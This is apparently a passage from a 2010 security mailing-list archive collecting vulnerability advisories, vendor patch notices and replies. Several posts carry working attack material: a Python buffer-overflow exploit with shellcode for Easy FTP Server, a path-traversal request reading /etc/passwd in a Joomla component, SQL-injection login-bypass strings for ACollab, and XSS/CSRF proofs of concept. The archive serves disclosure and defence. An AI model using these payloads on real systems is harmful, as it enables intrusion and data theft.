 471cf9d248c1868bf9cb52e0cf544a10  
2008.0/x86_64/apache-mod_ldap-2.2.6-8.6mdv2008.0.x86_64.rpm
 f32c311f6fd086c49cebfcd61b685fce  
2008.0/x86_64/apache-mod_mem_cache-2.2.6-8.6mdv2008.0.x86_64.rpm
 d4f5e603a512172fb1079942eaa9c076  
2008.0/x86_64/apache-mod_proxy-2.2.6-8.6mdv2008.0.x86_64.rpm
 581b37d6fa9de183f81676686693e689  
2008.0/x86_64/apache-mod_proxy_ajp-2.2.6-8.6mdv2008.0.x86_64.rpm
 5e866de5a08f901f76ea0f37f6502624  
2008.0/x86_64/apache-mod_ssl-2.2.6-8.6mdv2008.0.x86_64.rpm
 9bae7e180f5aa6310a7c324f

XSS vulnerability in CMSimple

2010-08-16 Thread advisory
Vulnerability ID: HTB22558
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cmsimple.html
Product: CMSimple
Vendor: Peter Andreas Harteg ( http://www.cmsimple.org/ ) 
Vulnerable Version: 3.3 and Probably Prior Versions
Vendor Notification: 02 August 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/cmsimple/adm.php" script to 
properly sanitize user-supplied input in "site_title" variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:

http://host/"; method="post"  name="main" >

document.main.submit();


Xilisoft Video Converter Wizard 3 ogg file processing DoS

2010-08-16 Thread praveen_recker
ModLoad: 5b86 5b8b4000   C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 769c 76a73000   C:\WINDOWS\system32\USERENV.dll
(26c8.1818): Access violation - code c005 (!!! second chance !!!)
eax= ebx=019dc690 ecx= edx= esi=0199ffb0 edi=0199fe20
eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0246
*** WARNING: Unable to verify checksum for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll - 
avformat!yuv4mpeg_init+0x6e06:
0036a9ba 8a6811  mov ch,byte ptr [eax+11h]  ds:0023:0011=??
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:000> g
(26c8.1818): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx=019dc690 ecx= edx= esi=0199ffb0 edi=0199fe20
eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010246
avformat!yuv4mpeg_init+0x6e06:
0036a9ba 8a6811  mov ch,byte ptr [eax+11h]  ds:0023:0011=??
0:000> kv
ChildEBP RetAddr  Args to Child  
WARNING: Stack unwind information not available. Following frames may be wrong.
0012d860 003540ea 0012d8a0 0199ffb0 0012d8a0 avformat!yuv4mpeg_init+0x6e06
     avformat!nut_init+0x42a

0:000> d eip
0036a9ba  8a 68 11 8a 50 0f 8a 48-10 c1 e1 08 0b ca 33 d2  .h..P..H..3.
0036a9ca  8a 50 0e c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90  .P..
0036a9da  90 90 90 90 90 90 8b 44-24 04 33 c9 33 d2 8b 00  ...D$.3.3...
0036a9ea  8a 68 15 8a 50 13 8a 48-14 c1 e1 08 0b ca 33 d2  .h..P..H..3.
0036a9fa  8a 50 12 c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90  .P..
0036aa0a  90 90 90 90 90 90 56 8b-74 24 08 85 f6 74 54 57  ..V.t$...tTW
0036aa1a  b9 5a 00 00 00 33 c0 8b-fe f3 ab 68 00 40 00 00  .z...3...@..
0036aa2a  c7 46 04 00 40 00 00 e8-18 11 00 00 68 00 10 00  @...h...

PoC Start##

print("\nXilisoft Video Converter Wizard 3 ogg file processing DoS")

# Download from
# http://www.downloadatoz.com/xilisoft-video-converter/order.php?download=xilisoft-video-converter&url=downloadatoz.com/xilisoft-video-converter/wizard.html/__xilisoft-video-converter__d1
# http://www.downloadatoz.com/xilisoft-video-converter/wizard.html

# 8400 bytes of filler: the file carries no valid Ogg page header
buff = "D" * 8400

try:
    oggfile = open("XilVC_ogg_crash.ogg", "w")
    oggfile.write(buff)
    oggfile.close()
    print("[+]Successfully created ogg file\n")
    print("[+]Coded by Praveen Darshanam\n")
except IOError:
    print("[+]Cannot create File\n")

PoC End


XSS vulnerability in CMSimple

2010-08-16 Thread advisory
Vulnerability ID: HTB22559
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cmsimple_1.html
Product: CMSimple
Vendor: Peter Andreas Harteg ( http://www.cmsimple.org/ ) 
Vulnerable Version: 3.3 and Probably Prior Versions
Vendor Notification: 02 August 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/cmsimple/adm.php" script to 
properly sanitize user-supplied input in "text" variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:

http://host/"; method="post" name="main" >

document.main.submit();


XSRF (CSRF) in CMSimple

2010-08-16 Thread advisory
Vulnerability ID: HTB22561
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_cmsimple.html
Product: CMSimple
Vendor: Peter Andreas Harteg ( http://www.cmsimple.org/ ) 
Vulnerable Version: 3.3 and Probably Prior Versions
Vendor Notification: 02 August 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/cmsimple/adm.php" script to 
properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:

http://host/"; method="post"  name="main" >

document.main.submit();


XSS vulnerability in pimcore

2010-08-16 Thread advisory
Vulnerability ID: HTB22562
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pimcore.html
Product: pimcore
Vendor: elements.at New Media Solutions GmbH. ( http://www.pimcore.org/ ) 
Vulnerable Version: 1.1.0 and Probably Prior Versions
Vendor Notification: 02 August 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the page saving script to properly 
sanitize user-supplied input in "data" variable. Successful exploitation of 
this vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is 
available:

http://host/admin/page/save/task/publish"; method="post"  name="main" >

document.main.submit();


[ MDVSA-2010:151 ] libmikmod

2010-08-16 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:151
 http://www.mandriva.com/security/
 ___

 Package : libmikmod
 Date: August 16, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in libmikmod:
 
 Multiple heap-based buffer overflows might allow remote attackers
 to execute arbitrary code via (1) crafted samples or (2) crafted
 instrument definitions in an Impulse Tracker file (CVE-2009-3995).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3995
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3996
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2546
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2971
 ___

 Updated Packages:


Re: Re: Amblog 1.0 Joomla Component Multiple SQL Injection Vulnerabilities

2010-08-16 Thread Salvatore Fresta aka Drosophila
No, it isn't a good idea. You can always use JRequest::getVar,
specifying the type
(http://api.joomla.org/Joomla-Framework/Environment/JRequest.html#getVar).

The allowed types are: INT, FLOAT, BOOLEAN, WORD, ALNUM, CMD, BASE64,
STRING, ARRAY, PATH.

Regards.

-- 
Salvatore Fresta aka Drosophila
http://www.salvatorefresta.net
CWNP444351


Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

2010-08-16 Thread Salvatore Fresta aka Drosophila

Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

 Name              Jgrid
 Vendor            http://datagrids.clubsareus.org
 Versions Affected 1.0

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-14

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION


DATA GRID Component built on the popular EXTJS Framework.


II. DESCRIPTION
___

A parameter is not properly sanitised before being used
by the require_once function.


III. ANALYSIS
_

Summary:

 A) Local File Inclusion
 

A) Local File Inclusion
___

The controller parameter in jgrid.php is not sanitised
before being used by the PHP function require_once().
This allows a guest to include local files. The following
is the affected code:

if($controller = JRequest::getVar('controller')) {
require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}


IV. SAMPLE CODE
___

A) Local File Inclusion

http://site/path/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00


V. FIX
__

No fix.



Insecure secure cookie in Tornado

2010-08-16 Thread Nam Nguyen
BLUE MOON SECURITY ADVISORY 2010-01
===


:Title: Insecure secure cookie in Tornado
:Severity: Low
:Reporter: Blue Moon Consulting
:Products: Tornado v1.0
:Fixed in: Tornado v1.0.1


Description
---

Tornado is an open source version of the scalable, non-blocking web server and 
tools that power FriendFeed.

A secure cookie in Tornado is stored in three parts, separated by a pipe sign 
(``|``)

::

  <value>|<timestamp>|<signature>

where:

<value>
  is the cookie's value encoded in Base64, which does use the digits 0 to 9.

<timestamp>
  is ``str(int(time.time()))``.

<signature>
  is the keyed hash value of <value> and <timestamp> concatenated.

The problem is ``get_secure_cookie`` only checks for expired timestamp and the 
<signature> does not take into account the separator character. An attacker, 
therefore, can move the pipe sign to the left by 4-character blocks to create 
another valid cookie, whose timestamp is in the far future, and value truncated 
by 3 characters.

This vulnerability is rated at low severity due to situational exploiting 
conditions.

Workaround
--

There is no workaround.

Fix
---

Customers are advised to upgrade to at least version 1.0.1.

Disclosure
--

Blue Moon Consulting adapts `RFPolicy v2.0 
`_ in notifying vendors.

:Initial vendor contact:

  August 13, 2010: Notice sent to Ben Darnell.

:Vendor response:

  August 13, 2010: Ben replied confirming the bug.

:Further communication:

  August 13, 2010: Ben added that the attacker would have to shift by 4 digits 
due to Base64 encoding.
  
  August 13, 2010: Ben added that version 1.0.1 would have a timestamp check.

:Public disclosure: August 16, 2010

:Exploit code:

  No exploit code required.

Disclaimer
--

The information provided in this advisory is provided "as is" without warranty 
of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either 
express or implied, including the warranties of merchantability and fitness for 
a particular purpose. Your use of the information on the advisory or materials 
linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd 
reserves the right to change or update this notice at any time.


-- 
Nam Nguyen, CISA, CISSP, CSSLP
Blue Moon Consulting Co., Ltd
http://www.bluemoon.com.vn




Re: XSS vulnerability in Eden Platform

2010-08-16 Thread security curmudgeon

: Product: Eden Platform
: Vendor: Preation ( http://www.preation.com/ ) 
: Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions
: Risk level: Medium 

The vendor web page has a free trial feature, with no obvious version. 
Your version of 01.07.2010 appears to be something you designated, perhaps 
based on the date you notified the vendor.

It appears this is a site specific issue in Preation / Eden.

Can you confirm this is a downloadable product and the version affected?



Re: XSS vulnerability in Theeta CMS

2010-08-16 Thread security curmudgeon

: Vulnerability ID: HTB22489
: Reference: 
http://www.htbridge.ch/advisory/xss_vulnerability_in_theeta_cms_2.html
: Vendor: MN Tech Solutions
: Vulnerable Version: 0.0

: The vulnerability exists due to failure in the "forum.php" script to 
: properly sanitize user-supplied input in "forum" variable. Successful 
: exploitation of this vulnerability could result in a compromise of the 
: application, theft of cookie-based authentication credentials, 
: disclosure or modification of sensitive data.

Disclosed on 2009-12-01 by c0dy[at]r00tDefaced.net, and assigned 
CVE-2009-4782.


Re: XSS vulnerability in WebPress

2010-08-16 Thread security curmudgeon

: Product: WebPress
: Vendor: YWP ( http://www.goywp.com/ ) 
: Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions

The vendor web page has a demo feature that is powered by "YWP 13.00.04". 
Creating a demo via their site, the changelog shows "05.05.2010 - Released 
version 13.00.04". Your version of 01.07.2010 appears to be something you 
designated, based on the date you notified the vendor.

It appears this is a site specific issue in YWP (http://www.goywp.com/).

Can you confirm this is a downloadable product and the version affected?




Re: XSS vulnerability in CruxCMS

2010-08-16 Thread security curmudgeon

: Vulnerability ID: HTB22445
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cruxcms.html
: Product: CruxCMS
: Vendor: CruxSoftware
: Vulnerable Version: 3.00 and Probably Prior Versions
: Risk level: Medium 
: Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

: The vulnerability exists due to failure in the "search.php" script to 
: properly sanitize user-supplied input in "search" variable. Successful 
: exploitation of this vulnerability could result in a compromise of the 
: application, theft of cookie-based authentication credentials, 
: disclosure or modification of sensitive data.
: 
: http://host/search.php?search=%27%22%3E%3Cscript%3Ealert%28234%29%3C/script%3E

This was discovered 2008-02-04 by Psiczn and assigned CVE-2008-0700.

Please search your favorite VDB for vulnerabilities before posting 
advisories.


[ MDVSA-2010:150 ] libsndfile

2010-08-16 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:150
 http://www.mandriva.com/security/
 ___

 Package : libsndfile
 Date: August 14, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in libsndfile:
 
 The (1) htk_read_header, (2) alaw_init, (3) ulaw_init, (4) pcm_init,
 (5) float32_init, and (6) sds_read_header functions in libsndfile
 1.0.20 allow context-dependent attackers to cause a denial of service
 (divide-by-zero error and application crash) via a crafted audio file
 (CVE-2009-4835).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4835
 ___

 Updated Packages:


Easy FTP Server v1.7.0.11 DELE, STOR, RNFR, RMD, XRMD Command Buffer Overflow

2010-08-16 Thread Glafkos Charalambous
# Exploit Title: Easy FTP Server v1.7.0.11 Multiple Command Buffer Overflow
# Date: August 12, 2010
# Author: Glafkos Charalambous
# Software Link:
http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip
# Version: 1.7.0.11
# Tested on: Windows XP SP3 En
# Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD

import socket
import sys

if len(sys.argv) != 4:
    print "Usage: ./easyftp.py   "
    print "Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD"
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]

buffersize = 268
 

# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe

shellcode = ("\xd9\xec\xba\x4c\x61\x82\xbc\xd9\x74\x24\xf4\x33\xc9\xb1\x33"
"\x58\x31\x50\x17\x83\xe8\xfc\x03\x1c\x72\x60\x49\x60\x9c\xed"
"\xb2\x98\x5d\x8e\x3b\x7d\x6c\x9c\x58\xf6\xdd\x10\x2a\x5a\xee"
"\xdb\x7e\x4e\x65\xa9\x56\x61\xce\x04\x81\x4c\xcf\xa8\x0d\x02"
"\x13\xaa\xf1\x58\x40\x0c\xcb\x93\x95\x4d\x0c\xc9\x56\x1f\xc5"
"\x86\xc5\xb0\x62\xda\xd5\xb1\xa4\x51\x65\xca\xc1\xa5\x12\x60"
"\xcb\xf5\x8b\xff\x83\xed\xa0\x58\x34\x0c\x64\xbb\x08\x47\x01"
"\x08\xfa\x56\xc3\x40\x03\x69\x2b\x0e\x3a\x46\xa6\x4e\x7a\x60"
"\x59\x25\x70\x93\xe4\x3e\x43\xee\x32\xca\x56\x48\xb0\x6c\xb3"
"\x69\x15\xea\x30\x65\xd2\x78\x1e\x69\xe5\xad\x14\x95\x6e\x50"
"\xfb\x1c\x34\x77\xdf\x45\xee\x16\x46\x23\x41\x26\x98\x8b\x3e"
"\x82\xd2\x39\x2a\xb4\xb8\x57\xad\x34\xc7\x1e\xad\x46\xc8\x30"
"\xc6\x77\x43\xdf\x91\x87\x86\xa4\x6e\xc2\x8b\x8c\xe6\x8b\x59"
"\x8d\x6a\x2c\xb4\xd1\x92\xaf\x3d\xa9\x60\xaf\x37\xac\x2d\x77"
"\xab\xdc\x3e\x12\xcb\x73\x3e\x37\xa8\x12\xac\xdb\x01\xb1\x54"
"\x79\x5e")

 
eip = "\x91\xC8\x41\x7E"
nopsled = "\x90" * 16
junk = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))
payload = nopsled+shellcode+junk+eip

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((target, port))
    print "[+] Connected"
except:
    print "[!] Connection Failed"
    sys.exit(0)
s.recv(1024)

s.send('User ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
print "[+] Sending payload..."
s.send(command +' '+payload+'\r\n')
s.close()


Regards,
Glafkos Charalambous





ACollab Multiple Vulnerabilities

2010-08-16 Thread admin

##www.BugReport.ir
#
#AmnPardaz Security Research Team
#
# Title:ACollab Multiple Vulnerabilities
# Vendor:   http://www.atutor.ca/acollab
# Vulnerable Version:   1.2 (Latest version till now)
# Exploitation: Remote with browser
# Fix:  N/A
###


- Description:


ACollab, as described by its vendor, is an accessible, open source,
multi-group, Web-based collaborative work environment. ACollab is
available as a standalone collaborative work environment that will run on
its own. ACollab is ideal for groups working at a distance developing
documentation, collaborating on research, or writing joint papers.



- Vulnerability:


+--> SQL Injection
	All of the parameters are sanitized correctly before being used in
	SQL queries, except for the POST parameters 'login' and 'password'
	in the "sign_in.php" page. These parameters can be used for injecting
	arbitrary SQL queries; the 'login' parameter is single quoted and the
	'password' parameter is single parenthesized, single quoted.

+--> Authentication Bypass
	The ACollab CMS uses two mechanisms for authentication: one for the
	master admin user, which is based on a hard-coded username/password
	initialized in the installation process, and a DB-based
	authentication for all other users, including the group
	administrators, who can add/remove/edit all posts and news and ...
	from forums and the first screen of the website. The second
	authentication mechanism can be bypassed.


- Exploits/PoCs:


+--> Exploiting The (MySQL) SQL Injection Vulnerability:
	Go to the sign-in page at "victim.net/ACollab/sign_in.php" and use
	the following vectors for injecting your desired SQL query, namely $Q:
  - In the Username field (login POST parameter): ' or $Q or ''='
  - In the Password field (password POST parameter): ') or $Q or (''='

+--> Exploiting The Authentication Bypass Vulnerability:
	You can log in as any of the registered users of ACollab CMS by
	providing the following vector as username and nothing as password:
  'or''='' limit 1 offset 0 -- '
	The above vector will log you in as the first user according to its
	member id order. You can log in as other users, searching for a group
	administrator account, with the following vectors:
  'or''='' limit 1 offset 0 -- '
  'or''='' limit 1 offset 1 -- '
  'or''='' limit 1 offset 2 -- '



- Solution:


Add the following commands
$_POST['login'] = addslashes ($_POST['login']);
$_POST['password'] = addslashes ($_POST['password']);

at line 46 of the 'sign_in.php' file.


- Original Advisory:


http://www.bugreport.ir/index_72.htm


- Credit:

AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com



iDefense Security Advisory 08.10.10: Microsoft Office RTF Parsing Engine Memory Corruption Vulnerability

2010-08-16 Thread iDefense Labs
iDefense Security Advisory 08.10.10
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 10, 2010

I. BACKGROUND

Microsoft Word is a word processing application from Microsoft Office.
For more information about Microsoft Word, see the following website:
http://office.microsoft.com/en-us/word/default.aspx

Rich-Text Format (RTF) is a document file format developed by Microsoft
for cross-platform document interchange.

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in Microsoft's
Office RTF Parsing Engine could allow an attacker to execute arbitrary
code with the privileges of the current user.

During the processing of an RTF document containing certain control
words, the RTF parsing engine may incorrectly read a value from the RTF
file. This value may directly affect the control of execution flow
within the RTF parsing engine.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user who opened a malicious RTF document
with Microsoft Office.

To exploit this vulnerability, a targeted user must load a malicious RTF
file created by an attacker, or simply receive an email containing
malicious RTF content. An attacker typically accomplishes this via
social engineering or injecting content into a compromised, trusted
site.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Microsoft
Word 2003, Microsoft Word 2007, and Microsoft Outlook 2007. A full list
of vulnerable Microsoft products can be found in Microsoft Security
Bulletin MS10-056.

V. WORKAROUND

Microsoft suggested workarounds can be found in Microsoft Security
Bulletin MS10-056.

VI. VENDOR RESPONSE

Microsoft Corp. has released patches which address this issue.
Information about downloadable vendor updates can be found by clicking
on the URLs shown.
http://www.microsoft.com/technet/security/bulletin/MS10-056.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2010-1901 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/11/2009  Initial Vendor Notification
08/11/2009  Initial Vendor Reply
08/10/2010  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by wushi of team509.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2010 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.